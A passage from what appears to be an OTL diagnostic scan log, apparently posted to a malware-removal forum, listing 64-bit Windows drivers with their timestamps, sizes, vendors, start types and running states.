DRV:[b]64bit:[/b] - [2017/12/14 02:39:21 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vwifimp.sys -- (vwifimp)
DRV:[b]64bit:[/b] - [2017/12/14 02:39:18 | 000,114,688 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\UcmCx.sys -- (UcmCx0101)
DRV:[b]64bit:[/b] - [2017/12/14 02:39:18 | 000,060,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\urscx01000.sys -- (UrsCx01000)
DRV:[b]64bit:[/b] - [2017/11/12 09:08:37 | 000,068,904 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\point64.sys -- (Point64)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:47 | 000,037,272 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:44 | 000,293,272 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mssecflt.sys -- (MsSecFlt)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:44 | 000,151,552 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\smbdirect.sys -- (smbdirect)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:42 | 000,040,344 | ---- | M] (Microsoft Corporation) [File_System | Disabled | Stopped] -- C:\Windows\SysNative\drivers\UevAgentDriver.sys -- (UevAgentDriver)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:40 | 000,056,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpatialGraphFilter.sys -- (SpatialGraphFilter)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:38 | 000,030,616 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:36 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tsusbhub.sys -- (tsusbhub)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:35 | 000,158,616 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AppvVemgr.sys -- (AppvVemgr)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:35 | 000,143,768 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AppvVfs.sys -- (AppvVfs)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:35 | 000,126,872 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AppVStrm.sys -- (AppvStrm)
DRV:[b]64bit:[/b] - [2017/09/30 15:41:33 | 000,559,616 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\csc.sys -- (CSC)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\vwififlt.sys -- (vwififlt)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vwifibus.sys -- (vwifibus)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:07 | 000,019,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\irenum.sys -- (IRENUM)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:06 | 000,143,872 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mrxdav.sys -- (MRxDAV)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:05 | 000,081,304 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:04 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\ws2ifsl.sys -- (ws2ifsl)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:02 | 000,323,072 | ---- | M] (Microsoft Corporation) [File_System | Disabled | Stopped] -- C:\Windows\SysNative\drivers\udfs.sys -- (udfs)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:02 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ndiscap.sys -- (NdisCap)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:02 | 000,042,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\modem.sys -- (Modem)
DRV:[b]64bit:[/b] - [2017/09/29 14:42:01 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\scfilter.sys -- (scfilter)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,192,000 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ndiswan.sys -- (ndiswanlegacy)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,192,000 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ndiswan.sys -- (NdisWan)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,106,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\rasl2tp.sys -- (Rasl2tp)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,078,336 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\rassstp.sys -- (RasSstp)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,028,160 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\asyncmac.sys -- (AsyncMac)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ndistapi.sys -- (NdisTapi)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:57 | 000,108,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\agilevpn.sys -- (RasAgileVpn)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:57 | 000,085,504 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ipfltdrv.sys -- (IpFilterDriver)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:57 | 000,082,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\raspppoe.sys -- (RasPppoe)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,128,000 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,106,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tunnel.sys -- (tunnel)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,084,480 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,051,712 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\tcpipreg.sys -- (tcpipreg)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,049,152 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\qwavedrv.sys -- (QWAVEdrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,021,504 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:51 | 000,259,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WUDFRd.sys -- (WUDFWpdMtp)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:51 | 000,259,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WUDFRd.sys -- (WUDFWpdFs)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:51 | 000,259,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WUDFRd.sys -- (WUDFRd)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:51 | 000,115,200 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WUDFPf.sys -- (WudfPf)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:49 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ksthunk.sys -- (ksthunk)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:49 | 000,012,800 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mstee.sys -- (MSTEE)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:49 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mspqm.sys -- (MSPQM)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:49 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mspclock.sys -- (MSPCLOCK)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:47 | 000,116,736 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bridge.sys -- (MsBridge)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:47 | 000,087,960 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:45 | 000,373,144 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\volmgrx.sys -- (volmgrx)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:45 | 000,080,896 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\rspndr.sys -- (rspndr)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,918,240 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\Wdf01000.sys -- (Wdf01000)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,225,688 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,132,608 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NetAdapterCx.sys -- (NetAdapterCx)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,093,184 | ---- | M] (Microsoft Corporation) [File_System | Disabled | Running] -- C:\Windows\SysNative\drivers\cdfs.sys -- (cdfs)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,055,704 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,029,592 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\hwpolicy.sys -- (hwpolicy)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 001,849,752 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,371,608 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Running] -- C:\WINDOWS\SysNative\drivers\fastfat.sys -- (fastfat)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,354,304 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\exfat.sys -- (exfat)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,209,304 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,085,400 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\fileinfo.sys -- (FileInfo)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,036,864 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\filetrace.sys -- (Filetrace)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,035,736 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wimmount.sys -- (WIMMount)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,033,792 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wdnsfltr.sys -- (wdnsfltr)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,018,432 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\applockerfltr.sys -- (applockerfltr)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:40 | 000,936,856 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refsv1.sys -- (ReFSv1)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,266,648 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ufx01000.sys -- (Ufx01000)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,214,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ipnat.sys -- (IPNAT)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,154,520 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,146,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\UcmTcpciCx.sys -- (UcmTcpciCx0101)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,081,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,074,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,039,424 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IndirectKmd.sys -- (IndirectKmd)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,039,320 | ---- | M] (Microsoft Corporation) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\cnghwassist.sys -- (cnghwassist)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,011,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,008,704 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidkmdf.sys -- (mshidkmdf)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,169,880 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,152,984 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\pacer.sys -- (Psched)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mpsdrv.sys -- (mpsdrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshwnclx.sys -- (HwNClx0101)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:25 | 000,124,416 | ---- | M] (Microsoft Corporation) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:23 | 000,056,728 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iorate.sys -- (iorate)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:23 | 000,043,520 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mmcss.sys -- (MMCSS)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:19 | 000,309,144 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:19 | 000,119,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:19 | 000,044,608 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:17 | 000,030,104 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,227,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Ucx01000.sys -- (Ucx01000)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,127,896 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,123,288 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,062,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (tsusbflt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,055,808 | ---- | M] (Microsoft Corporation) [File_System | System | Running] -- C:\Windows\SysNative\drivers\filecrypt.sys -- (FileCrypt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,045,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Udecx.sys -- (UdeCx)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,039,832 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\ramdisk.sys -- (Ramdisk)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,034,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vhf.sys -- (vhf)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 000,026,112 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ipt.sys -- (IPT)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,513,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbhub.sys -- (usbhub)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,281,600 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xboxgip.sys -- (xboxgip)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,168,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbccgp.sys -- (usbccgp)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,140,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ufxsynopsys.sys -- (ufxsynopsys)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,130,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\USBSTOR.SYS -- (USBSTOR)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,114,688 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidbth.sys -- (HidBth)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,107,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,105,984 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\i8042prt.sys -- (i8042prt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,099,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xusb22.sys -- (xusb22)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,097,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\UfxChipidea.sys -- (UfxChipidea)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,095,640 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbehci.sys -- (usbehci)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,092,672 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\winusb.sys -- (WINUSB)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,063,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kbdclass.sys -- (kbdclass)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,057,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mouclass.sys -- (mouclass)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,052,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,050,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidinterrupt.sys -- (hidinterrupt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,049,048 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,046,592 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xinputhid.sys -- (xinputhid)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,045,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,040,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hidusb.sys -- (HidUsb)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,040,448 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kbdhid.sys -- (kbdhid)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,039,424 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\buttonconverter.sys -- (buttonconverter)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,035,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbuhci.sys -- (usbuhci)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,032,768 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mouhid.sys -- (mouhid)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbohci.sys -- (usbohci)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,028,568 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\urschipidea.sys -- (UrsChipidea)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,028,160 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sermouse.sys -- (sermouse)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,027,544 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\urssynopsys.sys -- (UrsSynopsys)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,026,112 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\genericusbfn.sys -- (genericusbfn)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,018,000 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\WindowsTrustedRTProxy.sys -- (WindowsTrustedRTProxy)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,014,336 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\umpass.sys -- (UmPass)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:04 | 000,035,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:04 | 000,033,176 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SDFRd.sys -- (SDFRd)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:04 | 000,018,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\swenum.sys -- (swenum)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,674,200 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,604,160 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\rt640x64.sys -- (rt640x64)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,505,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mausbhost.sys -- (mausbhost)
